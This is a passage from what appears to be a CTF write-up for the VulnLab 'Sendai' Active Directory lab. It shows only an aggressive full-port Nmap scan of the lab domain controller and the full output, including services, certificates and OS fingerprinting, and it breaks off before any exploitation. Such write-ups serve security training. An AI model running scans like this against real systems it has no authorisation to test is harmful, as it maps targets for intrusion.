4941 words
25 minutes
Sendai
2025-09-10
VulnLab
CTF
/
Windows
/
Active Directory
/
SMB
/
BloodHound
/
ADCS

Initial access#

Nmap Scan#

I began the assessment with a comprehensive Nmap scan to identify open ports and running services on the target domain controller:

Terminal window
# Nmap 7.95 scan initiated Wed Sep 10 21:24:11 2025 as: /usr/lib/nmap/nmap --privileged -sV -vv -p- -A --min-rate 3000 -oN sendai_tcp.txt 10.129.220.222
Nmap scan report for 10.129.220.222 (10.129.220.222)
Host is up, received echo-reply ttl 127 (0.048s latency).
Scanned at 2025-09-10 21:24:12 +01 for 196s
Not shown: 65511 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-10 20:25:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after:  2026-08-18T12:30:05
| MD5:   879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
| -----BEGIN CERTIFICATE-----
| MIIGFTCCBP2gAwIBAgITVwAAAATYPsFplvexvwAAAAAABDANBgkqhkiG9w0BAQsF
| ADBDMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZzZW5kYWkx
| FTATBgNVBAMTDHNlbmRhaS1EQy1DQTAeFw0yNTA4MTgxMjMwMDVaFw0yNjA4MTgx
| MjMwMDVaMBcxFTATBgNVBAMTDGRjLnNlbmRhaS52bDCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAM/zoBh9/Vf9Dg2a7ZByPbs7K7m34f14/NBkNL+qvWwW
| A6uVwcXtdqZTm2m/ihyTcq1HCADBVR57BcB0S6nkIIqoTis/ATH+E4zj1Mpek3ml
| IxXv3yer14cVtP5cCmlm92rFMLbdAmnH3VyEGoE0pg64OtwPbAuYHTpnuaRQvdfl
| dWILGe0qsBahDpOhgxnpxLZFuacK3mCy45mz8T1iwYpMLo9WE7z2o/THjP58dCJ3
| +a9HoEcqz5mdon4OK/ZDWokCC5m2JVXwdglm04SeU5pTLqIuvkvrFPF6xByTo6OG
| w0mD55O3dpqu2AXPHpxmSszZUHZedZ7oZYHah9X/vlkCAwEAAaOCAywwggMoMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTMwODU4NzI3NDItNTcwOTcyODIzLTczNjc2NDEz
| Mi0xMDAwMDgGA1UdEQQxMC+gHwYJKwYBBAGCNxkBoBIEEB6FyoYBEbdOhIdd+rz6
| DSGCDGRjLnNlbmRhaS52bDAdBgNVHQ4EFgQUvcswuDmO6a7M1hAuQYYIq7/AN/Qw
| HwYDVR0jBBgwFoAUSemJy2wGmS2/ToDZ6jjJnKaooz4wgcMGA1UdHwSBuzCBuDCB
| taCBsqCBr4aBrGxkYXA6Ly8vQ049c2VuZGFpLURDLUNBLENOPWRjLENOPUNEUCxD
| Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
| cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgbwGCCsGAQUF
| BwEBBIGvMIGsMIGpBggrBgEFBQcwAoaBnGxkYXA6Ly8vQ049c2VuZGFpLURDLUNB
| LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0B
| AQsFAAOCAQEAhxfDqVgK+WpagVPhh89RuqlcLnfnYgeBTRQTEwrzI7OZ4SF1//04
| eSwGSqxNPoShh7oMGO2FE/ad5LxFu1KdS+zTWyXCw4B9HgXKOdM1wmxpJujwFyXt
| JGZHrnQzaa0ePj9i/tpjk/D0Q0gurbAkjTlEw5FAitraZuYOT7SVf8bL0u/6RIBo
| syB2pUE3O//Dj+O7t2xOj9swvokQ6Dnlq0VN313aIVrPrgFnUdfVpd3B2yoXXziD
| KZ2i9fc55HIMZ5VM/aN5M7UT1KqdD7BoEG8b3bq0gi0iCCsxjQyRMsw5Dd3UcCuQ
| R4i0WBM2m9vQoSf/jw1s4S1uQ69/cK9iwQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-18T12:39:21
| Not valid after:  2024-07-18T00:00:00
| MD5:   3223:91f5:f1f7:4e16:738e:382d:053e:c7fa
| SHA-1: 5282:f809:dcc9:8d53:e9a1:065a:25a1:c741:fa2c:4bc5
| -----BEGIN CERTIFICATE-----
| MIIC9TCCAd2gAwIBAgIQKG7SWIn2M6tPyGomAHBoSjANBgkqhkiG9w0BAQsFADAX
| MRUwEwYDVQQDEwxkYy5zZW5kYWkudmwwHhcNMjMwNzE4MTIzOTIxWhcNMjQwNzE4
| MDAwMDAwWjAXMRUwEwYDVQQDEwxkYy5zZW5kYWkudmwwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQDcBXcByvqbxTJwsmevy4Bj83CH0vCBzz3cev/4fxMG
| Ill5epHVaQJSNAwCRseP2KJYUqfpUaZuJTjhvtm9V6uRdhBNy9xtMH/kGfx6KVeO
| TViixsc/X5DCROAcjUhnsXJa1pmtcTItDn+f0VMYbjHsMGqM+yOeguPSXPztnMWZ
| TtuwKH/EnyUIOtxo3tIuCLthRt4W36r6I9kkYmpWhPyuhVssAFuQ8fL7JyVTFWBE
| cvG9YO0a4B8+t4PBnUKdMf8n0I6viITltxQpSby1Atlx1lF9OngDK/sKnxiYSzFw
| 64bOIRU8EVAo8dCab5ZrHM2H2KphvaFWccccJGytsz2FAgMBAAGjPTA7MAsGA1Ud
| DwQEAwIEsDATBgNVHSUEDDAKBggrBgEFBQcDATAXBgNVHREEEDAOggxkYy5zZW5k
| YWkudmwwDQYJKoZIhvcNAQELBQADggEBAB9DGOlZwCpk4UGmyYa7R+D924WY6QQ7
| nHLlL/F1KKXY29Ps2WKj4EwPkWrwBmMy6T5rIyJJIIuM4SIXWeXCjOo7RcLkYoM4
| eyONMuzZINzzr83EypJbygJVt4wPlYPJpkP8Xsl4Y3RCYiRqVeDmW+sUfOh4NmBo
| jS9ra3d/LtStdVbMGtWEIXGISSZN0v5ygCAQMUSrcCbvDJESHJrALGJ8TLLLn86p
| qivJSaN69CybqAILhPph0/yb7iBG4LH06LXq7Ros7r5c8kaMjELOHSb+DsiDfGfM
| kYMg/u4NFqroRzmHFo1Z0H/vN4Au33hmsj6pCVzGnQDMs2/mDAfLKLg=
|_-----END CERTIFICATE-----
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after:  2026-08-18T12:30:05
| MD5:   879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
| -----BEGIN CERTIFICATE-----
| MIIGFTCCBP2gAwIBAgITVwAAAATYPsFplvexvwAAAAAABDANBgkqhkiG9w0BAQsF
| ADBDMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZzZW5kYWkx
| FTATBgNVBAMTDHNlbmRhaS1EQy1DQTAeFw0yNTA4MTgxMjMwMDVaFw0yNjA4MTgx
| MjMwMDVaMBcxFTATBgNVBAMTDGRjLnNlbmRhaS52bDCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAM/zoBh9/Vf9Dg2a7ZByPbs7K7m34f14/NBkNL+qvWwW
| A6uVwcXtdqZTm2m/ihyTcq1HCADBVR57BcB0S6nkIIqoTis/ATH+E4zj1Mpek3ml
| IxXv3yer14cVtP5cCmlm92rFMLbdAmnH3VyEGoE0pg64OtwPbAuYHTpnuaRQvdfl
| dWILGe0qsBahDpOhgxnpxLZFuacK3mCy45mz8T1iwYpMLo9WE7z2o/THjP58dCJ3
| +a9HoEcqz5mdon4OK/ZDWokCC5m2JVXwdglm04SeU5pTLqIuvkvrFPF6xByTo6OG
| w0mD55O3dpqu2AXPHpxmSszZUHZedZ7oZYHah9X/vlkCAwEAAaOCAywwggMoMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTMwODU4NzI3NDItNTcwOTcyODIzLTczNjc2NDEz
| Mi0xMDAwMDgGA1UdEQQxMC+gHwYJKwYBBAGCNxkBoBIEEB6FyoYBEbdOhIdd+rz6
| DSGCDGRjLnNlbmRhaS52bDAdBgNVHQ4EFgQUvcswuDmO6a7M1hAuQYYIq7/AN/Qw
| HwYDVR0jBBgwFoAUSemJy2wGmS2/ToDZ6jjJnKaooz4wgcMGA1UdHwSBuzCBuDCB
| taCBsqCBr4aBrGxkYXA6Ly8vQ049c2VuZGFpLURDLUNBLENOPWRjLENOPUNEUCxD
| Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
| cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgbwGCCsGAQUF
| BwEBBIGvMIGsMIGpBggrBgEFBQcwAoaBnGxkYXA6Ly8vQ049c2VuZGFpLURDLUNB
| LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0B
| AQsFAAOCAQEAhxfDqVgK+WpagVPhh89RuqlcLnfnYgeBTRQTEwrzI7OZ4SF1//04
| eSwGSqxNPoShh7oMGO2FE/ad5LxFu1KdS+zTWyXCw4B9HgXKOdM1wmxpJujwFyXt
| JGZHrnQzaa0ePj9i/tpjk/D0Q0gurbAkjTlEw5FAitraZuYOT7SVf8bL0u/6RIBo
| syB2pUE3O//Dj+O7t2xOj9swvokQ6Dnlq0VN313aIVrPrgFnUdfVpd3B2yoXXziD
| KZ2i9fc55HIMZ5VM/aN5M7UT1KqdD7BoEG8b3bq0gi0iCCsxjQyRMsw5Dd3UcCuQ
| R4i0WBM2m9vQoSf/jw1s4S1uQ69/cK9iwQ==
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after:  2026-08-18T12:30:05
| MD5:   879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
| -----BEGIN CERTIFICATE-----
| MIIGFTCCBP2gAwIBAgITVwAAAATYPsFplvexvwAAAAAABDANBgkqhkiG9w0BAQsF
| ADBDMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZzZW5kYWkx
| FTATBgNVBAMTDHNlbmRhaS1EQy1DQTAeFw0yNTA4MTgxMjMwMDVaFw0yNjA4MTgx
| MjMwMDVaMBcxFTATBgNVBAMTDGRjLnNlbmRhaS52bDCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAM/zoBh9/Vf9Dg2a7ZByPbs7K7m34f14/NBkNL+qvWwW
| A6uVwcXtdqZTm2m/ihyTcq1HCADBVR57BcB0S6nkIIqoTis/ATH+E4zj1Mpek3ml
| IxXv3yer14cVtP5cCmlm92rFMLbdAmnH3VyEGoE0pg64OtwPbAuYHTpnuaRQvdfl
| dWILGe0qsBahDpOhgxnpxLZFuacK3mCy45mz8T1iwYpMLo9WE7z2o/THjP58dCJ3
| +a9HoEcqz5mdon4OK/ZDWokCC5m2JVXwdglm04SeU5pTLqIuvkvrFPF6xByTo6OG
| w0mD55O3dpqu2AXPHpxmSszZUHZedZ7oZYHah9X/vlkCAwEAAaOCAywwggMoMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTMwODU4NzI3NDItNTcwOTcyODIzLTczNjc2NDEz
| Mi0xMDAwMDgGA1UdEQQxMC+gHwYJKwYBBAGCNxkBoBIEEB6FyoYBEbdOhIdd+rz6
| DSGCDGRjLnNlbmRhaS52bDAdBgNVHQ4EFgQUvcswuDmO6a7M1hAuQYYIq7/AN/Qw
| HwYDVR0jBBgwFoAUSemJy2wGmS2/ToDZ6jjJnKaooz4wgcMGA1UdHwSBuzCBuDCB
| taCBsqCBr4aBrGxkYXA6Ly8vQ049c2VuZGFpLURDLUNBLENOPWRjLENOPUNEUCxD
| Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
| cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgbwGCCsGAQUF
| BwEBBIGvMIGsMIGpBggrBgEFBQcwAoaBnGxkYXA6Ly8vQ049c2VuZGFpLURDLUNB
| LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0B
| AQsFAAOCAQEAhxfDqVgK+WpagVPhh89RuqlcLnfnYgeBTRQTEwrzI7OZ4SF1//04
| eSwGSqxNPoShh7oMGO2FE/ad5LxFu1KdS+zTWyXCw4B9HgXKOdM1wmxpJujwFyXt
| JGZHrnQzaa0ePj9i/tpjk/D0Q0gurbAkjTlEw5FAitraZuYOT7SVf8bL0u/6RIBo
| syB2pUE3O//Dj+O7t2xOj9swvokQ6Dnlq0VN313aIVrPrgFnUdfVpd3B2yoXXziD
| KZ2i9fc55HIMZ5VM/aN5M7UT1KqdD7BoEG8b3bq0gi0iCCsxjQyRMsw5Dd3UcCuQ
| R4i0WBM2m9vQoSf/jw1s4S1uQ69/cK9iwQ==
|_-----END CERTIFICATE-----
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after:  2026-08-18T12:30:05
| MD5:   879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
| -----BEGIN CERTIFICATE-----
| MIIGFTCCBP2gAwIBAgITVwAAAATYPsFplvexvwAAAAAABDANBgkqhkiG9w0BAQsF
| ADBDMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZzZW5kYWkx
| FTATBgNVBAMTDHNlbmRhaS1EQy1DQTAeFw0yNTA4MTgxMjMwMDVaFw0yNjA4MTgx
| MjMwMDVaMBcxFTATBgNVBAMTDGRjLnNlbmRhaS52bDCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAM/zoBh9/Vf9Dg2a7ZByPbs7K7m34f14/NBkNL+qvWwW
| A6uVwcXtdqZTm2m/ihyTcq1HCADBVR57BcB0S6nkIIqoTis/ATH+E4zj1Mpek3ml
| IxXv3yer14cVtP5cCmlm92rFMLbdAmnH3VyEGoE0pg64OtwPbAuYHTpnuaRQvdfl
| dWILGe0qsBahDpOhgxnpxLZFuacK3mCy45mz8T1iwYpMLo9WE7z2o/THjP58dCJ3
| +a9HoEcqz5mdon4OK/ZDWokCC5m2JVXwdglm04SeU5pTLqIuvkvrFPF6xByTo6OG
| w0mD55O3dpqu2AXPHpxmSszZUHZedZ7oZYHah9X/vlkCAwEAAaOCAywwggMoMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTMwODU4NzI3NDItNTcwOTcyODIzLTczNjc2NDEz
| Mi0xMDAwMDgGA1UdEQQxMC+gHwYJKwYBBAGCNxkBoBIEEB6FyoYBEbdOhIdd+rz6
| DSGCDGRjLnNlbmRhaS52bDAdBgNVHQ4EFgQUvcswuDmO6a7M1hAuQYYIq7/AN/Qw
| HwYDVR0jBBgwFoAUSemJy2wGmS2/ToDZ6jjJnKaooz4wgcMGA1UdHwSBuzCBuDCB
| taCBsqCBr4aBrGxkYXA6Ly8vQ049c2VuZGFpLURDLUNBLENOPWRjLENOPUNEUCxD
| Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
| cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgbwGCCsGAQUF
| BwEBBIGvMIGsMIGpBggrBgEFBQcwAoaBnGxkYXA6Ly8vQ049c2VuZGFpLURDLUNB
| LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0B
| AQsFAAOCAQEAhxfDqVgK+WpagVPhh89RuqlcLnfnYgeBTRQTEwrzI7OZ4SF1//04
| eSwGSqxNPoShh7oMGO2FE/ad5LxFu1KdS+zTWyXCw4B9HgXKOdM1wmxpJujwFyXt
| JGZHrnQzaa0ePj9i/tpjk/D0Q0gurbAkjTlEw5FAitraZuYOT7SVf8bL0u/6RIBo
| syB2pUE3O//Dj+O7t2xOj9swvokQ6Dnlq0VN313aIVrPrgFnUdfVpd3B2yoXXziD
| KZ2i9fc55HIMZ5VM/aN5M7UT1KqdD7BoEG8b3bq0gi0iCCsxjQyRMsw5Dd3UcCuQ
| R4i0WBM2m9vQoSf/jw1s4S1uQ69/cK9iwQ==
|_-----END CERTIFICATE-----
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-09-10T20:27:26+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-15T02:26:14
| Not valid after:  2025-10-15T02:26:14
| MD5:   4f35:91c2:3387:873e:3f73:7e83:1f59:fbbb
| SHA-1: 584e:2cc7:1336:099a:33c8:eee9:efe0:6922:8e71:95ce
| -----BEGIN CERTIFICATE-----
| MIIC3DCCAcSgAwIBAgIQKuF1NcIlY4FNpMV86ttHbzANBgkqhkiG9w0BAQsFADAX
| MRUwEwYDVQQDEwxkYy5zZW5kYWkudmwwHhcNMjUwNDE1MDIyNjE0WhcNMjUxMDE1
| MDIyNjE0WjAXMRUwEwYDVQQDEwxkYy5zZW5kYWkudmwwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQDNHgDP8zUjKEITrDV+OcmojamI683UUr5mxScIqNQS
| IDhdLKRgVTB+uRlwLU4XNAtLnN6xVCd1GLAMJwHZDAr084MjDHjwnfUihc5VZImp
| wXRsQunh6Wz0EwPTjTOKkaavM/n4xOBFBNGrtRNMiQj9ClIxNug1/ntLTntuMnWD
| QdG1qzjTr19uazqbXFCHjuWobbM4oxEezJIlgM8JEaliloK4j1h5LPPBwhuZWPUu
| TG/Cr+VnGw4k/SU/jevDINNiweT90MBf7aKTQogJBUpJMd/qwnz6MhUwUPxQyN3u
| lJkM/60PwrGNG49NovTnueupuQLlr0ZK2p1AJL3REpydAgMBAAGjJDAiMBMGA1Ud
| JQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEA
| DrykA5TA6uNu+Cq6GKkoak4ecJ5Bvnosjg69juRiJKU8MnimNshVoJeAAc6CEGuS
| Pr9+dALaUthlI1i083NTyLePICWWE3HIh4x2Vuk6dOF5fVTsQqdFfpXQt83Bus/s
| NFpGXxbDE6a1elVwRFtymPUbSiBLF3cBGm2ud7P+TPCE8tKohF06K1C5f51Css5i
| B/IzGFhKYjHsHRKPYMNbWcQDIX3yNH92S/VBvzS4IauUyvDCbBBKIhq2GhKRfHJp
| boGHCZdqobPNLnd80loYHYdbBoVxMT24YEAKhlbpDfvaKmIEtnVcuBHPlWtJdMfO
| jLGAEg3qGeeiaJ02yGMaug==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
|   Target_Name: SENDAI
|   NetBIOS_Domain_Name: SENDAI
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: sendai.vl
|   DNS_Computer_Name: dc.sendai.vl
|   DNS_Tree_Name: sendai.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-10T20:26:46+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
52627/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56893/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56895/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56912/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57531/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57550/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=9/10%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68C1DF30%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=2%ISR=10A%TI=I%II=I%SS=S%TS=A)
SEQ(SP=FF%GCD=1%ISR=104%TI=I%II=I%SS=S%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)


Uptime guess: 0.016 days (since Wed Sep 10 21:05:00 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-09-10T20:26:50
|_  start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 46518/tcp): CLEAN (Timeout)
|   Check 2 (port 49587/tcp): CLEAN (Timeout)
